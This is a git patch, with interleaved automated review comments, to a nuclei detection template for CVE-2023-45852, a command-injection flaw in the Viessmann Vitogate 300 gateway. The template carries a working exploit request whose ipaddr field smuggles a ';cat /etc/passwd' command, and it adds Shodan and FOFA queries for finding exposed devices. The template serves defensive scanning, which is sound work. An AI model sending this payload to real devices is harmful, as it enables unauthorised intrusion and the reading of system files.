From 25ad1850f76a3dbfda5a7e130adf51065c2a5f47 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 20 Oct 2023 21:06:05 +0530
Subject: [PATCH] updated matcher

---
 http/cves/2023/CVE-2023-4582.yaml | 37 ++++++++++++-------------------
 1 file changed, 14 insertions(+), 23 deletions(-)

diff --git a/http/cves/2023/CVE-2023-4582.yaml b/http/cves/2023/CVE-2023-4582.yaml
index bba0c7394f..59ec128c7f 100644
--- a/http/cves/2023/CVE-2023-4582.yaml
+++ b/http/cves/2023/CVE-2023-4582.yaml
@@ -1,14 +1,15 @@
 id: CVE-2023-45852
+
 info:
-  name: Viessmann Vitogate 300 - Unauthenticated Remote Code Execution
-  author: iamnoooob, rootxharsh, pdresearch
+  name: Viessmann Vitogate 300 - Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
   severity: critical
   description: |
     In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.
   reference:
     - https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html
     - https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md
-  tags: rce,vitogate
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-45852
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -18,11 +19,10 @@ info:
   metadata:
     verified: true
     max-request: 1
+    shodan-query: title:"Vitogate 300"
+    fofa-query: title="Vitogate 300"
     vendor: Viessmann
-    shodan-query: title="Vitogate 300"
-
-variables:
-  marker: "{{randstr}}"
+  tags: cve,cve2023,rce,vitogate
 
 http:
   - raw:
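Review bot: The template `id: CVE-2023-45852` and the newly added NVD reference both name CVE-2023-45852, yet the file is still `http/cves/2023/CVE-2023-4582.yaml`, so the path and the id disagree; if the repository's template validation checks that the file name matches the id this will be rejected, and either way the file should be renamed to `CVE-2023-45852.yaml` so the template can be found by its CVE. The new `name` drops "Unauthenticated" while the unchanged description and the `PR:N` CVSS vector still state that no authentication is needed; keeping the qualifier in the name, or removing it from all three consistently, avoids the mismatch.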
@@ -31,21 +31,12 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{marker}};cat /etc/passwd"}}
+        {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{randstr}};cat /etc/passwd"}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - 'traceroute: {{marker}}: Unknown host'
-          - 'daemon:x:1:1:'
-
-      - type: word
-        part: header
-        words:
-          - 'Content-Type: application/json'
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(header, "application/json")'
+          - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")'
+        condition: and
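Review bot: The new dsl matcher substitutes `{{randstr}}` a second time after the request body already used it, so the match only holds if nuclei expands the same generated value into both the request and the matcher expression; the removed `variables: marker: "{{randstr}}"` made that single evaluation explicit, so it is worth confirming that `randstr` is stable for the whole template run rather than re-generated per expansion. `contains_all(header, "application/json")` carries only one needle, and `contains(header, "application/json")` says the same thing more plainly. The trailing `condition: and` is now load-bearing, since the three expressions used to be separate matchers joined by the removed `matchers-condition: and`; a comment above the matcher, e.g. `# status, JSON content type and the echoed marker must all hold`, would record why the single-dsl form still needs the conjunction rather than the default.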